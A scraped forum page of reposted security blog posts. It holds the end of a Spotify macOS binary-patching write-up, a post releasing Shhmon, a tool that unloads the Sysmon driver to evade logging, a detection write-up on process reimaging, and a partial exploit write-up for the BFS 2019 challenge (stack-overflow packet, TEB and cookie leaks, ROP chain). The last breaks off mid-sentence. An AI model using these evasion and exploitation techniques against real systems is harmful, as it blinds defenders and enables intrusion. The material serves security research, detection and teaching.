to the mediaKeyTap:receivedMediaKeyEvent: selector is SPTBrowserClientMacObjCAnnex. Therefore, we can iterate over the objc_class structures pointed to by the __objc_classlist section until the name of the struct is equal to SPTBrowserClientMacObjCAnnex. Let’s get to it. First, we have to iterate over the __objc_classlist section. But to do that, we need to know where the section is. This information is contained within the Mach-O header (which is why it was revealed with objdump -h). Parsing the Header There are plenty of existing articles about the Mach-O file format and the documentation is fairly lucid so I won’t go into too much detail here. All you really need to know is that there are several “segment load commands” contained within the header. A segment load command (LC) simply specifies a region of the file and where to map it into memory. Directly after the segment LC, there will be a number of section structs. Each section’s extent both within the file and virtual memory are contained within its corresponding segment but the sections offer a more fine-grained mapping. If you were paying attention before, the __objc_classlist section is contained within the __DATA segment. Therefore, we can find it’s region in the file like so: #include <mach-o/loader.h>FILE *fp; size_t i,j,curr_off; struct mach_header_64 header; struct load_cmd load_cmd; struct segment_command_64 seg_cmd; struct section_64 sect;struct section_64 objc_classlist_sect;fp = fopen("/Applications/Spotify.app/Contents/MacOS/Spotify", "r"); fread(&header, sizeof(header), 1, fp); Here, we are simply setting up some variables and reading in the Mach-O header. Then, we can iterate over the load commands: for (i=0; i<header.ncmds; i++) { fread(&load_cmd, sizeof(load_cmd), 1, fp); if (load_cmd.cmd != LC_SEGMENT_64) { fseek(fp, load_cmd.cmdsize - sizeof(load_cmd), SEEK_CUR); continue; } fread((char *)&seg_cmd + sizeof(load_cmd), sizeof(seg_cmd) - sizeof(load_cmd), 1, fp); if (strcmp(seg_cmd.segname, "__DATA")) { fseek(fp, load_cmd.cmdsize - sizeof(seg_cmd), SEEK_CUR); continue; } Here, we ignore any LC’s that are not segment LC’s (there are many different types specified in the ABI). Then, we read in the LC as a segment LC and ignore it if it is not the __DATA segment. Then, we will iterate over sections in the __DATA segment: for (j=0; j<seg_cmd.nsects; j++) { fread(&sect, sizeof(sect), 1, fp); if (!strncmp(sect.sectname, "__objc_classlist", 16)) { memcpy(&objc_classlist_sect, &sect, sizeof(sect)); break; } } break; } Once we find the section with the correct name, we copy it into our target variable and exit the loop. Now that we can iterate over the objc_class structs, we need to know how to get the class name and method names for each class. While the Objective-C runtime is open source, I couldn’t find the type declarations corresponding to the version of Objective-C used in the Spotify binary, so you can declare the types like so: The fields are of type uint64_t instead of pointers because they are used as offsets into the file. The __DATA segment could be mmap'd and then the values treated as pointers but this leads to complications when mmap is unable to allocate the segment at its original address. Anyways, the data field of objc_class “points” to an objc_class_data structure. This structure contains both the name of the class and a base_methods “pointer” to the methods defined for this class. The method list consists of an objc_methodlist struct followed by objc_methodlist.count objc_method structures. Each objc_method struct will tell us the method name and it’s imp pointer (and it’s type signature but we don’t really care about that). I’ll link to the code later but it’s a straightforward extension of the previous code listings to iterate through the classes to find our SPTBrowserClientMacObjCAnnex class and iterate through the class’s methods to find the mediaKeyTap:receivedMediaKeyEvent: selector. Finding the Call Assuming we have the imp pointer for our mediaKeyTap: method, we can then use the Capstone library to disassemble the function and find the call to the media key tap handler: #include <capstone/capstone.h>uint8_t code[500]; size_t start_addr, i, insn_count; uint64_t target_addr;csh handle; cs_insn *nsn;fseek(fp, (meth->imp) & 0xffffff, SEEK_SET); fread(code, 1, 500, fp);cs_open(CS_ARCH_X86, CS_MODE_64, &handle);start_addr = meth->imp; insn_count = cs_disasm(handle, code, 500, 0, &insn)for (i=0; i<insn_count; i++) { if (strcmp(insn[i].mnemonic, "mov") || strcmp(insn[i].op_str, "esi, 3")) continue; target_addr = strtoll(insn[i+2].op_str, NULL, 16); break; } We look for the “next” case (that is mov esi, 3) since if you look at the disassembly: this case actually comes first in memory. We then take the instruction two after the mov esi, 3 instruction to find our target call. Remember that this subprocedure is actually a wrapper for our final target, so we have to perform the same disassembly procedure on the following function: Taking note of the highlight, after checking some conditions, this function jumps to our final destination five instructions are preparing register esi with the contents of register r14d. Therefore, we can do something like: ...if strcmp(insn[i].mnemonic, "mov") || strcmp(insn[i].op_str, "esi, r14d")) continue;*reloc_addr = insn[i+5].address+1; *reloc_pc = insn[i+5].address + insn[i+5].size; target_addr = strtoll(insn[i+5].op_str, NULL, 16);... Here, when we find our sentinel instruction, mov esi, r14d, in addition to setting our target address (the address of the function with the large switch statement), we set two additional variables: reloc_addr and reloc_pc. To understand these two variables, we first need to cover how we will automate the hooking process. Automatic Hooking Normally, the control flow from our media key handler wrapper will look like: However, we will patch instructions to make it to look like: The redirect to “my MK Handler” will be done through patching the jmp sub_100067E40 instruction in the Wrapper to actually be jmp &new MK Handler. Since jmp tells the CPU to set the new program counter (PC) relative to where it currently is, we need to know what the program counter after this instruction occurs. This is where the variable reloc_pc comes into play. We set it to insn[i+5].address + insn[i+5].size because that is what the PC will be after the jmp executes. We also need to know the address of the relative offset in the jmp instruction in order to patch it. Since the jmp opcode is only one byte, we set reloc_addr to insn[i+5].address+1. Patching the jmp Now that we have the PC after the jump and the address of the offset, we can actually patch the instruction to jump to our own code. To do this, we will create a dylib and insert an LC_LOAD_DYLIB LC into the Mach-O load commands much like in my iOS post: https://medium.com/@lerner98/skiptracing-part-2-ios-3c610205858b. Assume in the library constructor, we called our resolve function and got three pieces of information: mkHandler, the address of Spotify’s media key handler function mk_reloc_addr, the address of the offset in the jump to mkHandler mk_reloc_pc, the PC after the aforementioned jump We now have to adjust the memory protections for the bytes we wish to write since by default the __TEXT segment has only RX permissions initially. Thankfully, the max protections specified in the binary are RWX (even though we could patch this as well). Let’s do this: uint64_t prot_mask; uint64_t prot_addr; size_t prot_size;prot_mask = ~((1 << 12) - 1); // since page size is 4k prot_addr = mk_reloc_addr & prot_mask; prot_size = 4 + mk_reloc_addr - prot_addr;mprotect((void *)prot_addr, prot_size, PROT_WRITE);*mk_reloc_addr = (int32_t)((int64_t)(&new_mkHandler) - mk_reloc_pc);mprotect((void *)prot_addr, prot_size, PROT_READ | PROT_EXEC); where new_mkHandler is defined as: void new_mkHandler(void ***appDelegate, int32_t keyCode); Note that we have to mask off the lower twelve bits of mk_reloc_addr since mprotect requires that the address we pass be page-aligned. We then need to adjust the size of our protected region from four bytes (since the jump offset is 32 bits) to account for the difference between mk_reloc_addr and prot_addr. Let’s put some dummy code in new_mkHandler just to see if we hit it: void new_mkHandler(void ***appDelegate, int32_t keyCode) { printf("here!\n"); exit(69); } To load our dylib, we can use the code from Part 2 to insert a LC_LOAD_DYLIB command into the Mach-O file. If we do this and run the Spotify application, then sure enough we should see our print statement (if running through the command line) and we should have a nice exit code. Overwriting the Function Pointers Now to call our own prev and next subprocedures instead of Spotify’s will require some ingenuity. To see why, let’s take a look at the “next” case in the MK handler switch statement: Note that in the beginning of the function, the app delegate pointer (in rdi) is moved into register r13. Therefore, the code dereferences the app delegate twice and then moves a function pointer at offset 0x58 of that struct into register r12. This is the register that holds the address to the next subprocedure and is called at the bottom of the listing. Looking through the rest of MK handler, we can see that the offset 0x58 into the rax struct is only referenced here, so we can safely overwrite the function pointer at that address so the address of our own next subprocedure will be loaded into r12 and subsequently called. If we look at the “prev” case, we can see that the exact same steps are taken except the function pointer is located at offset 0x50 in the rax struct. Therefore, we can write some code in our new_mkHandler to overwrite these function pointers because we can make no assumptions as to the address of rax struct before the MK handler is called. The code will look something like this: typedef prev_next_func_t(int64_t, int64_t, int64_t);uint64_t prot_mask; uint64_t prot_addr; size_t prot_size; uint64_t fp_off; uint64_t *fp;prot_mask = ~((1 << 12) - 1); // since page size is 4kfp_off = (uint64_t)(**appDelegate) + 0x50; fp = (uint64_t *)fp_off;prevHandler = (prev_next_func_t *)(*fp); nextHandler = (prev_next_func_t *)(*(fp+1));prot_addr = fp_off & prot_mask; prot_size = 16 + fp_off - prot_addr;mprotect((void *)prot_addr, prot_size, PROT_WRITE);*fp = (uint64_t)(&new_prevHandler); *(fp+1) = (uint64_t)(&new_nextHandler);mprotect((void *)prot_addr, prot_size, PROT_READ | PROT_EXEC); Where new_prevHandler and new_nextHandler are defined as: void new_prevHandler(int64_t p1, int64_t p2, int64_t p3); void new_nextHandler(int64_t p1, int64_t p2, int64_t p3); It can be seen from the disassembly that the prev and next subprocedures take three 64-bit parameters but we don’t really need to know what they are. One gotcha is that we should only overwrite the function pointers once. To see why, think about what will happen the second time new_mkHandler is called. We set prevHandler to the first function pointer. However, we have already overwritten this function pointer with &new_prevHandler. Therefore, when we want to actually go to the previous track in new_prevHandler and call (*prevHandler)(p1, p2, p3), we will actually be calling new_prevHandler and will eventually overflow the stack. Therefore, we add a simple guard at the beginning to check if we have already overwritten the handlers: if (gHandlersSet) goto call_original;... overwrite function pointers ... gHandlersSet = 1;call_original: (*mkHandler)(appDelegate, keyCode); Now in new_prevHandler and new_nextHandler, all we have to do is push/pop a skip when appropriate and call (*prevHandler)(p1, p2, p3) or (*nextHandler)(p1, p2, p3). Wrapping Up All that’s left to do is get the current track and player position. Since these are exposed by Objective-C methods, we can use the functionality of the Objective-C runtime to call the appropriate functions without any patching, much like in Part 2. Here’s the link to the final repository which I’ve refactored to include the MacOS and iOS code: https://github.com/SamL98/SPSkip. I hope you enjoyed this exploration in patching and automated reverse engineering — I sure did! The Startup Written by Sam Lerner The Startup Sursa: https://medium.com/swlh/skiptracing-automated-hook-resolution-74eda756533d
  16. Shhmon — Silencing Sysmon via Driver Unload Matt Hand Follow Sep 18 · 4 min read Sysmon is an incredibly powerful tool to aide in data collection beyond Windows’ standard event logging capabilities. It presents a significant challenge for us as attackers as it has the ability to detect many indicators that we generate during operations, such as process creation, registry changes, file creation, among many other things. Sysmon is comprised of 2 main pieces — a system service and a driver. The driver provides the service with information which is processed for consumption by the user. Both the service and the driver’s names can be changed from their defaults to obfuscate the fact that Sysmon is running on the host. Today I am releasing Shhmon, a C# tool to challenge the assumption that our defensive tools are functioning as intended. This also introduces a situation where the Sysmon driver has been unloaded by a user without fltMC.exe and the service is still running. https://github.com/matterpreter/Shhmon Despite being able to rename the Sysmon driver during installation (Sysmon.exe -i -d $DriverName), it is loaded at a predefined altitude of 385201 at installation. A driver altitude is a unique identifier allocated by Microsoft indicating the driver’s position relative to others in the file systems stack. Think of this as a driver’s assigned parking spot. Each driver has a reserved spot where it is supposed to park. The driver should abide by this allocation. We can use functions supplied in fltlib.dll (FilterFindFirst() and FilterFindNext()) to hunt for a driver at 385201 & unload it. This is similar to the functionality behind fltMC.exe unload $DriverName , but allows us to evade command line logging which would be captured by Sysmon before the driver is unloaded. In order to unload the driver, the current process token needs to have SeLoadDriverPrivileges enabled, which Shhmon grants to itself using advapi32!AdjustTokenPrivileges. Defensive Guidance This technique generates interesting events worth investigating and correlating. Sysmon Event ID 255 Once the driver is unloaded, an error event with an ID of DriverCommunication will be generated. After this error occurs, logs will no longer be collected and parsed by Sysmon. Windows System Event ID 1 This event will also be generated on unload from the source “FilterManager” stating File System Filter <DriverName\> (Version 0.0, <Timestamp>) unloaded successfully. This event was not observed to be generated during a normal system restart. Windows Security Event ID 4672 In order to unload the driver, our Shhmon process needs to be granted SeLoadDriverPrivileges. During testing, this permission was only sporadically granted to NT AUTHORITY\SYSTEM and is not a part of its standard permission set. Sysmon Event ID 1/Windows Security Event ID 4688 Despite the intent of evading command line logging by using the API, the calling process will still be logged. An abnormal, high integrity process which is assigned SeLoadDriverPrivilege could be correlated with the above events to serve as a starting point for hunting. Bear in mind that this assembly could be used via something like Cobalt Strike’s execute-assembly functionality, where a seemingly innocuous binary would be the calling process. Going beyond these, I have found that Sysmon’s driver’s altitude can be changed via the registry. reg add "HKLM\SYSTEM\CurrentControlSet\Services\<DriverName>\Instances\Sysmon Instance" /v Altitude /t REG_SZ /d 31337 When the system is rebooted, the driver will be reloaded at the newly specified altitude. Sysmon with a non-default driver name running at altitude 31337 The new altitude could be discovered by reading the registry key HKLM:\SYSTEM\CurrentControlSet\Services\*\Instances\Sysmon Instance\Altitude, but this adds an additional layer of obfuscation which will need to be accounted for by an attacker. Note: I have found during testing that if the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. Additionally, there may be an opportunity to audit a handle opening on the \\.\FltMgr device object, which is done by fltlib!FilterUnload, by applying a SACL to the device object. Many thanks Matt Graeber and Brian Reitz for helping me hone in on these. References: Research inspiration from @Carlos_Perez’s post describing this tactic, as well as Matt Graeber and Lee Christensen’s Black Hat USA 2018 white paper. Alexsey Kabanov’s LazyCopy minifilter for demonstrating the marshaling of filter information and their method for creating resizable buffers. Posts By SpecterOps Team Members Written by Matt Hand I like red teaming, picking up heavy things, and burritos. Adversary Simulation @ SpecterOps. github.com/matterpreter Sursa: https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650
      • 1
      • Upvote
  17. You Can Run, But You Can’t Hide — Detecting Process Reimaging Behavior Jonathan Johnson Follow Sep 16 · 9 min read Background: Around 3 months ago, a new attack technique was introduced to the InfoSec community known as “Process Reimaging.” This technique was released by the McAfee Security team in a blog titled — “In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass.” A few days after this attack technique was released, a co-worker and friend of mine — Dwight Hohnstein — came out with proof of concept code demonstrating this technique, which can be found on his GitHub. While this technique isn’t yet mapped to MITRE ATT&CK, I believe it would fall under the Defense Evasion Tactic. Although the purpose of this blog post is to show the methodology used to build a detection for this attack, it assumes you have read the blog released by the McAfee team and have looked at Dwight’s proof of concept code. A brief high level outline of the attack is as follows: Process Reimaging is an attack technique that leverages inconsistencies in how the Windows Operating System determines process image FILE_OBJECT locations. This means that an attacker can drop a binary on disk and hide the physical location of that file by replacing its initial execution full file path with a trusted binary. This in turn allows an adversary to bypass Windows operating system process attribute verification, hiding themselves in the context of the process image of their choosing. There are three stages involved in this attack: A binary dropped to disk — This assumes breach and that the attacker can drop a binary to disk. Undetected binary loaded. This will be the original image loaded after process creation. The malicious binary is “reimaged” to a known good binary they’d like to appear as. This is achievable because the Virtual Address Descriptors (VADs) don’t update when the image is renamed. Consequently, this allows the wrong process image file information to be returned when queried by applications. This allows an adversary the opportunity to defensively evade detection efforts by analysts and incident responders. Too often organizations are not collecting the “right” data. Often, the data is unstructured, gratuitous, and lacking the substantive details required to arrive at a conclusion. Without quality data, organizations are potentially blind to techniques being ran across their environment. Moreover, by relying too heavily on the base configurations of EDR products (i.e. Windows Defender, etc.) you yield the fine-grained details of detection to a third party which may or may not use the correct function calls to detect this malicious activity (such as the case of GetMappedFileName properly detecting this reimaging). Based off of these factors, this attack allows the adversary to successfully evade detection. For further context and information on this attack, check out the Technical Deep Dive portion in the original blog post on this topic. Note: GetMappedFileName is an API that is used by applications to query process information. It checks whether the address requested is within a memory-mapped file in the address space of the specified process. If the address is within the memory-mapped file it will return the name of the memory-mapped file. This API requires PROCESS_QUERY_INFORMATION and PROCESS_VM_READ access rights. , any time a handle has the access rights PROCESS_QUERY_INFORMATION, it is also granted PROCESS_QUERY_LIMITED_INFORMATION. Those access rights have bitmask 0x1010. This may look familiar, as that is one of the desired access rights used by Mimikatz. Matt Graeber brought to my attention that this is the source of many false positives when trying to detect suspicious access to LSASS based on granted access. Transparency: When this attack was released I spent a Saturday creating a hunt hypothesis, going through the behavioral aspects of the data, and finding its relationships. When reviewing Dwight’s POC I noticed Win32 API calls in the code, and from those I was positive I could correlate those API calls to specific events. because like many defenders I made assumptions regarding EDR products and their logging capabilities. Without a known API to Event ID mapping, I started to map these calls myself. I began (and continue to work on) the Sysmon side of the mapping. This involves reverse engineering the Sysmon driver to map API calls to Event Registration Mechanisms to Event ID’s. Huge shoutout to Matt Graeber, for helping me in this quest and taking the time to teach me the process of reverse engineering. Creating this mapping was a key part of the Detection Strategy that I implemented and would not have been possible without it. Process Reimaging Detection: Detection Methodology: The methodology that was used for this detection is as follows: Read the technical write up of the Process Reimaging attack. Read through Dwight’s POC code. Gain knowledge on how the attack executes, create relationships between data and the behavior of the attack. Execute the attack. Apply the research knowledge with the data relationships to make a robust detection. Detection Walk Through When walking through the Technical Deep Dive portion of the blog, this stood out to me: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ The picture above shows a couple of API calls that were used that particularly piqued my interest. LoadLibrary CreateProcess Based on my research inside of the Sysmon Driver, both of these API calls are funneled through an event registration mechanism. This mechanism is then called upon by the Sysmon Driver using the requisite Input/Output Interface Control (IOCTL) codes to query the data. The queried data will then be pulled back into the Sysmon Binary which then produces the correlating Event ID. For both of the API calls above their correlating processes are shown below: Mapping of Sysmon Event ID 1:Process Creation Mapping of Sysmon Event ID 7:Image Loaded Based off of this research and the technical deep dive section in the McAffee article, I know exactly what data will be generated when this attack is performed. Sysmon should have an Event ID 7 for each call to LoadLibrary, and an Event ID 1 for the call to CreateProcess; however, how do I turn data into actionable data? Data that a threat hunter can easily use and manipulate to suit their needs? To do this, we focus on Data Standardization and Data Quality. Data Quality is derived from Data Standardization. Data Standardization is the process of transforming data into a common readable format that can then be easily analyzed. Data Quality is the process of making sure the environment is collecting the correct data, which can then be rationalized to specific attack techniques. This can be achieved by understanding the behavior of non-malicious data and creating behavioral correlations of the data provided during this attack. For example, when a process is created the OriginalFileName (a relatively new addition to Sysmon) should match the Image section within Sysmon Event ID 1. Say you wanted to launch PowerShell, when you launch PowerShell the OriginalFileName will be Powershell.EXE and the Image will be C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. When these two things don’t match it is possibly an indicator of malicious activity. After process reimaging, and an application calls the GetMappedFileName API to retrieve the process image file, Windows will send back the incorrect file path. A correlation can be made between the Image field in Event ID 1 and the ImageLoaded field in Event ID 7. Since Event ID 1 and 7 both have the OriginalFileName field, an analyst can execute a JOIN on the data for both events. On this JOIN the results will show that the same process path of the process being created and the Image of the process being loaded should equal. With this correlation, one can determine that these two events are from the same activity subset. The correlation above follows this portion of the attack: Function section we are basing Detection from: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ Although a relationship can be made using Sysmon Event ID 1 and Sysmon Event ID 7, another relationship can be made based on the user mode API NtCreateFile. This will go through the event registration mechanism FltRegisterFilter which creates an Event ID 11 — File Creation in Sysmon. This relationship can be correlated on Sysmon Event ID 1’s Image field, which should match Sysmon Event ID 11’s TargetFilename. Sysmon Event ID 1’s ParentProcessGuid should also match Sysmon Event ID 11’s ProcessGuid to ensure the events are both caused by the same process. Now that the research is done, the hypotheses have to be tested. Data Analytics: Below shows the command of the attack being executed. The process (phase1.exe) was created by loading a binary (svchost.exe), then reimaged as lsass.exe. .\CSProcessReimagingPOC.exe C:\Windows\System32\svchost.exe C:\Windows\System32\lsass.exe The following SparkSQL code is the analytics version of what was discussed above: Query ran utilizing Jupyter Notebooks and SparkSQL. Gist I tried to make the JOIN functions as readable to the user as possible. One thing to note is that this query is pulling from the raw data logs within Sysmon. No transformations are being performed within a SIEM pipeline. Below is a visual representation of the joins and data correlations being done within Jupyter Notebooks utilizing SparkSQL. This query was also checked if a file created is subsequently moved to a different directory, as well if the OriginalFileName of a file didn’t equal the Image for Sysmon Event ID 1.(e.g: created process with Image — “ApplyTrustOffline.exe” and OriginalFileName — “ApplyTrustOffline.PROGRAM”) After these checks the query will only bring back the results of the reimaging attack. Graphed View of JOINs in Query The output of the SQL query above can be seen below. You find in the query output of data after the attack seems to have “duplicates” of the events. This isn’t the case. Each time the attack is run, there will be a Sysmon Event ID 11 — FileCreate that fires after each Sysmon Event ID 1 -Process Creation. This correlates to the behavior of the attack that was discussed above. Query Output The dataset and Jupyter Notebook that correlates with the following analysis is available on my GitHub. I encourage anyone to pull it down to analyze the data for themselves. If you don’t have a lab to test it in, one can be found here: https://github.com/jsecurity101/mordor/tree/master/environment/shire/aws. Below breaks down the stages and the information of the dataset that was ran. This correlates with the query that was ran above: One thing to keep in mind is when the malicious binary is reimaged to the binary of the adversaries choosing (stage 3), you will not see that “phase1.exe” was reimaged to “lsass.exe”. This is the behavior of the attack; Windows will send back the improper file object. This doesn’t debunk this detection. The goal is to discover the behavior of the attack, and once that is done you can either follow the ProcessGuid of “phase1.exe” or go to its full path to find the Image of the binary it was reimaged with. “Phase1.exe” will appear under the context of that reimaged binary. Image of the properties of phase1.exe after reimaging is executed Conclusion: Process Reimaging really piqued my interest as it seemed to be focused on flying under the radar to avoid detection. Each technique an attacker leverages will have data that follows the behavior of the attack. This can be leveraged, but only once we understand our data and data sources. Moving away from signature based hunts to more of the data driven hunt methodology will help with the robustness of detections. Thank You: Huge thank you to Matt Graeber for helping me with the reverse engineering process of the Sysmon Driver. To Dwight Hohnstein, for his POC code. Lastly, to Brian Reitz for helping when SQL wasn’t behaving. References/Resources: In NTDLL I Trust — Process Reimaging and Endpoint Security Solution Bypass Dwight’s Process Reimaging POC Microsoft Docs Posts By SpecterOps Team Members Written by Jonathan Johnson Posts By SpecterOps Team Members Posts from SpecterOps team members on various topics relating information security Sursa: https://posts.specterops.io/you-can-run-but-you-cant-hide-detecting-process-reimaging-behavior-e6bb9a10c40b
      • 1
      • Upvote
  18. Writeup for the BFS Exploitation Challenge 2019 Table of Contents Introduction TL;DR Initial Dynamic Analysis Statically Identifying the Vulnerability Strategy Preparing the Exploit Building a ROP Chain See Exploit in Action Contact Introduction Having enjoyed and succeeded in solving a previous BFS Exploitation Challenge from 2017, I've decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64 bit executable for which an exploit is expected to work on a Windows 10 Redstone machine. The challenge's goals were set to: Bypass ASLR remotely Achieve arbitrary code execution (pop calc or notepad) Have the exploited process properly continue its execution TL;DR Spare me all the boring details, I want to grab a copy of the challenge study the decompiled code study the exploit Initial Dynamic Analysis Running the file named 'eko2019.exe' opens a console application that seemingly waits for and accepts incoming connections from (remote) network clients. Quickly checking out the running process' security features using Sysinternals Process Explorer shows that DEP and ASLR are enabled, but Control Flow Guard is not. Good. Further checking out the running process dynamically using tools such as Sysinternals TCPView, Process Monitor or simply running netstat could have been an option right now, but personally I prefer diving directly into the code using my static analysis tool of choice, IDA Pro (I recommended following along with your favourite disassembler / decompiler). Statically Identifying the Vulnerability Having disassembled the executable file and looking at the list of identified functions, the maximum number of functions that need to be analyzed for weaknesses was as little as 17 functions out of 188 in total - with the remaining ones being known library functions, imported functions and the main() function itself. Navigating to and running the disassembled code's main() function through the Hex-Rays decompiler and putting some additional effort into renaming functions, variables and annotating the code resulted in the following output: By looking at the code and annotations shown in the screenshot above, we can see there is a call to a function in line 19 which creates a listening socket on TCP port 54321, shortly followed by a call to accept() in line 27. The socket handle returned by accept() is then passed as an argument to a function handle_client() in line 36. Keeping in mind the goals of this challenge, this is probably where the party is going to happen, so let's have a look at it. As an attacker, what we are going to look for and concentrate on are functions within the server's executable code that process any kind of input that is controlled client-side. All with the goal in mind of identifying faulty program logic that hopefully can be taken advantage of by us. In this case, it is the two calls to the recv() function in lines 21 and 30 in the screenshot above which are responsible for receiving data from a remote network client. The first call to recv() in line 21 receives a hard-coded number of 16 bytes into a "header" structure. It consists of three distinct fields, of which the first one at offset 0 is "magic", a second at offset 8 is "size_payload" and the third is unused. By accessing the "magic" field in line 25 and comparing it to a constant value "Eko2019", the server ensures basic protocol compatibility between connected clients and the server. Any client packet that fails in complying with this magic constant as part of the "header" packet is denied further processing as a consequence. By comparing the "size_payload" field of the "header" structure to a constant value in line 27, the server limits the field's maximum allowed value to 512. This is to ensure that a subsequent call to recv() in line 30 receives a maximum number of 512 bytes in total. Doing so prevents the destination buffer "buf" from being written to beyond its maximum size of 512 bytes - too bad! If this sanity check wasn't present, it would have allowed us to overwrite anything that follows the "buf" buffer, including the return address to main() on the stack. Overwriting the saved return address could have resulted in straightforward and reliable code execution. Skimming through this function's remaining code (and also through all the other remaining functions) doesn't reveal any more code that'd process client-side input in any obviously dangerous way, either. So we must probably have overlooked something and -yes you guessed it- it's in the processing of the "pkthdr" structure. A useful pointer to what the problem could be is provided by the hint window that appears as soon as the mouse is hovered over the comparison operator in line 27. As it turns out, it is a signed integer comparison, which means the size restriction of 512 can successfully be bypassed by providing a negative number along with the header packet in "size_payload"! Looking further down the code at line 30, the "size_payload" variable is typecast to a 16 bit integer type as indicated by the decompiler's LOWORD() macro. Typecasting the 32 bit "size_payload" variable to a 16 bit integer effectively cuts off its upper 16 bits before it is passed as a size argument to recv(). This enables an attacker to cause the server to accept payload data with a size of up to 65535 bytes in total. Sending the server a respectively crafted packet effectively bypasses the intended size restriction of 512 bytes and successfully overwrites the "buf" variable on the stack beyond its intended limits. If we wanted to verify the decompiler's results or if we refrained from using a decompiler entirely because we preferred sharpening or refreshing our assembly comprehension skills instead, we could just as well have a look at the assembler code: the "jle" instruction indicates a signed integer comparison the "movzx eax, word ptr..." instruction moves 16 bits of data from a data source to a 32 bit register eax, zero extending its upper 16 bits. Alright, before we can start exploiting this vulnerability and take control of the server process' instruction pointer, we need to find a way to bypass ASLR remotely. Also, by checking out the handle_client() function's prologue in the disassembly, we can see there is a stack cookie that will be checked by the function's epilogue which eventually needs to be taken care of . Strategy In order to bypass ASLR, we need to cause the server to leak an address that belongs to its process space. Fortunately, there is a call to the send() function in line 45, which sends 8 bytes of data, so exactly the size of a pointer in 64 bit land. That should serve our purpose just fine. These 8 bytes of data are stored into a _QWORD variable "gadget_buf" as the result of a call to the exec_gadget() function in line 44. Going further up the code to line 43, we can see self-modifying code that uses the WriteProcessMemory() API function to patch the exec_gadget() function with whatever data "gadget_buf" contains. The "gadget_buf" variable in turn is the result of a call to the copy_gadget() function in line 41 which is passed the address of a global variable "g_gadget_array" as an argument. Looking at the copy_gadget() function's decompiled code reveals that it takes an integer argument, swaps its endianness and then returns the result to the caller. In summary, whatever 8 bytes the "g_gadget_array" at position "gadget_idx % 256" points to will be executed by the call to exec_gadget() and its result is then sent back to the connected client. Looking at the cross references to "g_gadget_array" which is only initialized during run-time, we can find a for loop that initializes 256 elements of the array "g_gadget_array" as part of the server's main() function: Going back to the handle_client() function, we find that the "gadget_idx" variable is initialized with 62, which means that a gadget pointed to by "p_gadget_array[62]" is executed by default. The strategy is getting control of the "gadget_idx" variable. Luckily, it is a stack variable adjacent to the "buf[512]" variable and thus can be written to by sending the server data that exceeds the "buf" variable's maximum size of 512 bytes. Having "gadget_idx" under control allows us to have the server execute a gadget other than the default one at index 62 (0x3e). In order to be able to find a reasonable gadget in the first place, I wrote a little Python script that mimics the server's initialization of "g_gadget_array" and then disassembles all its 256 elements using the Capstone Engine Python bindings: I spent quite some time reading the resulting list of gadgets trying to find a suitable gadget to be used for leaking a qualified pointer from the running process, but with partial success only. Knowing I must have been missing something, I still settled with a gadget that would manage to leak the lower 32 bits of a 64 bit pointer only, for the sake of progressing and then fixing it the other day: Using this gadget would modify the pointer that is passed to the call to exec_gadget(), making it point to a location other than what the "p" pointer usually points to, which could then be used to leak further data. Based on working around some limitations by hard-coding stuff, I still managed to develop quite a stable exploit including full process continuation. But it was only after a kind soul asked me whether I hadn't thought of reading from the TEB that I got on the right track to writing an exploit that is more than just quite stable. Thank you Preparing the Exploit The TEB holds vital information that can be used for bypassing ASLR, and it is accessed via the gs segment register on 64 bit Windows systems. Looking through the list of gadgets for any occurence of "gs:" yields a single hit at index 0x65 of the "g_gadget_array" pointer. Acquiring the current thread's TEB address is possible by reading from gs:[030h]. In order to have the gadget that is shown in the screenshot above to do so, the rcx register must first be set to 0x30. The rcx register is the first argument to the exec_gadget() function, which is loaded from the "p" variable on the stack. Like the "gadget_idx variable", "p" is adjacent to the overflowable buffer, hence overwritable as well. Great. By sending a particularly crafted sequence of network packets, we are now given the ability to leak arbitrary data of the server thread's TEB structure. For example, by sending the following packet to the server, gadget number 0x65 will be called with rcx set to 0x30. [0x200*'A'] + ['\x65\x00\x00\x00\x00\x00\x00\x00'] + ['\x30\x00\x00\x00\x00\x00\x00\x00'] Sending this packet will overwrite the target thread's following variables on the stack and will cause the server to send us the current thread's TEB address: [buf] + [gadget_idx] + [p] The following screenshot shows the Python implementation of the leak_teb() function used by the exploit. With the process' TEB address leaked to us, we are well prepared for leaking further information by using the default gagdet 62 (0x3e), which dereferences arbitrary 64 bits of process memory pointed to by rcx per request: In turn, leaking arbitrary memory allows us to bypass DEP and ASLR identify the stack cookie's position on the stack leak the stack cookie locate ourselves on the stack eventually run an external process In order to bypass ASLR, the "ImageBaseAddress" of the target executable must be acquired from the Process Environment Block which is accessible at gs:[060h]. This will allow for relative addressing of the individual ROP gadgets and is required for building a ROP chain that bypasses Data Execution Prevention. Based on the executable's in-memory "ImageBaseAddress", the address of the WinExec() API function, as well as the stack cookie's xor key can be leaked. What's still missing is a way of acquiring the stack cookie from the current thread's stack frame. Although I knew that the approach was faulty, I had initially leaked the cookie by abusing the fact that there exists a reliable pointer to the formatted text that is created by any preceding call to the printf() function. By sending the server a packet that solely consisted of printable characters with a size that would overflow the entire stack frame but stopping right before the stack cookie's position, the call to printf() would leak the stack cookie from the stack into the buffer holding the formatted text whose address had previously been acquired. While this might have been an interesting approach, it is an approach that is error-prone because if the cookie contained any null-bytes right in the middle, the call to printf() will make a partial copy of the cookie only which would have caused the exploit to become unreliable. Instead, I've decided to leak both "StackBase" and "StackLimit" from the TIB which is part of the TEB and walk the entire stack, starting from StackLimit, looking for the first occurence of the saved return address to main(). Relative from there, the cookie that belongs to the handle_client() function's stack frame can be addressed and subsequently leaked to our client. Having a copy of the cookie and a copy of the xor key at hand will allow the rsp register to be recovered, which can then be used to build the final ROP chain. Building a ROP Chain Now that we know how to leak all information from the vulnerable process that is required for building a fully working exploit, we can build a ROP chain and have it cause the server to pop calc. Using ROPgadget, a list of gadgets was created which was then used to craft the following chain: The ROP chain starts at "entry_point", which is located at offset 0x230 of the vulnerable function's "buf" variable and which previously contained the orignal return address to main(). It loads "ptr_to_chain" at offset 0x228 into the rsp register which effectively lets rsp point into the next gadget at 2.). Stack pivoting is a vital step in order to avoid 